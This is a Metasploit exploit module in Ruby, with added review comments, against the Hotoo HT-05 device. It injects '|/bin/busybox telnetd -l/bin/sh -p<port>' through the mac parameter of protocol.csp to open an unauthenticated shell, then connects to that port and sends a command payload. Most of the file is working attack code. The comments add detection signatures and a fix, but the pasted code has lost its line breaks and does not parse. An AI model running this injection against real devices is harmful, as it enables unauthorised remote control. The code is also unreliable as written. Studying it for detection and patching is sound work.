require 'msf/core'
require 'net/http'
# Metasploit remote-exploit module for the Hotoo HT-05 device (module
# metadata is in initialize below).  As pasted, the file has lost most of
# its line breaks and indentation (`definitialize`, `defsend_request`, the
# `#` on the 'Compat' line turns the remainder of that hash into a comment),
# so it does not parse as-is; the comments here describe the intended
# structure rather than the current token stream.
require "uri"classMetasploitModule< Msf::Exploit::Remote
# The Tcp mixin is used only for the final connect()/handler() step.  The
# HTTP request itself goes through Net::HTTP directly (see send_request),
# so it does not pick up the framework's HttpClient options (proxies, SSL,
# timeouts) — NOTE(review): consider the HttpClient mixin instead.
include Msf::Exploit::Remote::Tcp
# initialize: module metadata.  Payload is a cmd_interact / find-handler
# command payload ('Space' 2000, nops disabled), platform unix, a single
# 'Automatic' target.  RPORT (default 6666, registered below) is NOT the web
# port: it is the port the injected telnetd is told to listen on, and the
# port connect() dials in exploit.
##Exploit description#definitialize(info ={})super(update_info(info,'Name'=>'Hotoo HT-05remote shell exploit','Description'=>%q{
This module tries to open a door in the device by exploiting the RemoteCodeExecution by creating a backdoor inside the device
This exploit was written by Andrei Manole. Version of the firmware 2.000.022. Tested on 2.000.082-> it still works
},'Author'=>'Andrei Manole','References'=>[],'Privileged'=> true,'Platform'=>['unix'],'Arch'=> ARCH_CMD,'Payload'=>{'Space'=>2000,'BadChars'=>'','DisableNops'=> true,'Compat'=>{'PayloadType'=>'cmd_interact','ConnectionType'=>'find'}},#end of payload settings'Targets'=>[['Automatic',{}],],'DisclosureDate'=>"20 Dicembre 2018",'DefaultTarget'=>0))
register_options([ Opt::RPORT(6666)], self.class)
end
# send_request(host, port): one HTTP GET (to port 80 — the URI carries no
# port) against /protocol.csp.  The `mac` query parameter does not hold a
# MAC address: it carries `|/bin/busybox telnetd -l/bin/sh -p<port>`, i.e.
# the device evidently hands the value to a shell without sanitising it
# (command injection), which starts a telnet listener on <port> that serves
# /bin/sh with no login prompt.
# Defender notes: a request to protocol.csp whose mac= value contains `|`
# or `/bin/` is a clear detection signature in web/WAF logs, and an
# unexpected listener on port 6666 (or whatever RPORT was set to) is the
# on-device indicator; the device-side fix is to validate mac= against a
# strict MAC-address pattern before it reaches any shell.
# Returns true when the reply looks like HTTP 200 OK, false otherwise; a
# connection failure raises out of the method rather than returning false.
defsend_request(host,port)
uri = URI.parse("http://#{host}/protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|/bin/busybox%20telnetd%20-l/bin/sh%20-p#{port}")
http = Net::HTTP.new(uri.host, uri.port)
request = Net::HTTP::Get.new(uri.request_uri)
# NOTE(review): Net::HTTPResponse#code is a String, so `== 200` is never
# true, and `response.class.name` is "Net::HTTPOK", so the `'HTTPOK'`
# comparison is dead as well — only `response.message == 'OK'` decides the
# result.  (The `if` lost its line break and sits on the request line.)
response = http.request(request)if response.code ==200|| response.message =='OK'||response.class.name =='HTTPOK' then
return true
end
return false
end
# exploit: (1) send the injection request to RHOST and abort (raise) if the
# reply does not look successful, (2) open a plain TCP connection to
# RHOST:RPORT — the port the telnetd was told to listen on — and (3) write
# the encoded command payload, with stdout/stderr redirected to /dev/null,
# into that shell, then hand the socket to the find/cmd_interact handler.
# The `if !send_request(...)` after print_status and the `return` after
# handler(nsock) have lost their line breaks.
# `self.connect(false, ...)`: the first argument presumably means "do not
# make this the module's global socket" — confirm against
# Msf::Exploit::Remote::Tcp#connect.
def exploit #exploit
print_status("[+] Apertura backdoor in corso...")if !send_request(datastore['RHOST'],datastore['RPORT']) then
raise("[-] Errore nel apertura della porta")
end
print_good("[+] Richiesta inviata con successo! :)")
nsock = self.connect(false,{"RPORT"=> datastore['RPORT']})
print_good("[+] Porta aperta con successo ! :)")
# Payload goes straight into the remote shell; trailing redirect silences it.
nsock.put(payload.encoded +" >/dev/null 2>&1")
handler(nsock)return
end
end